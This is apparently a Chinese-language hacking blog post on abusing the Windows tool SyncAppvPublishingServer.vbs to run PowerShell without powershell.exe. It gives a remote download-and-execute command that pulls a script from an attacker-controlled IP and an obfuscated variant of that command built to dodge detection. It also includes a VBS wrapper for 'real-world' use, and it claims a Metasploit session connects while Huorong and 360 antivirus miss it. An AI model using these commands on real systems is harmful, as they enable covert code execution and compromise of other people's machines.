當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x01 SyncAppvPublishingServer 簡介
0x02 SyncAppvPublishingServer 使用
0x03 SyncAppvPublishingServer 執行payload
0x01 SyncAppvPublishingServer 簡介
Windows上有兩個版本的SyncAppVPublishingServer工具,它們是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他們來取代powershell。
0x02 SyncAppvPublishingServer 使用
在powershell下執行
SyncAppvPublishingServer.vbs break;powershell代碼
測試過程中使用的是SyncAppvPublishingServer.vbs,SyncAppvPublishingServer.exe 沒有成功
在cmd裏是無法執行powershell命令的
該命令需要在powershell裏進行執行
因此powershell腳本都可以通過SyncAppvPublishingServer.vbs來運行。
0x03 SyncAppvPublishingServer 執行payload
使用powershell木馬。
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
將powershell腳本進行混淆使用IEX遠程加載執行payload。
$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)
msf可正常上線。
在實戰中也可以直接寫成vbs腳本 run.vbs
Set oShell=WScript.CreateObject("WScript.Shell")
oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
點擊run.vbs也可以正常上線。
火絨、360均沒有檢測出
放在virustotal.com上a.bat查殺率爲1/56
參考鏈接:
Powershell Without Powershell.exe
https://www.youtube.com/watch?v=sema3EYnP2c
雖然我們生活在陰溝裏,但依然有人仰望星空!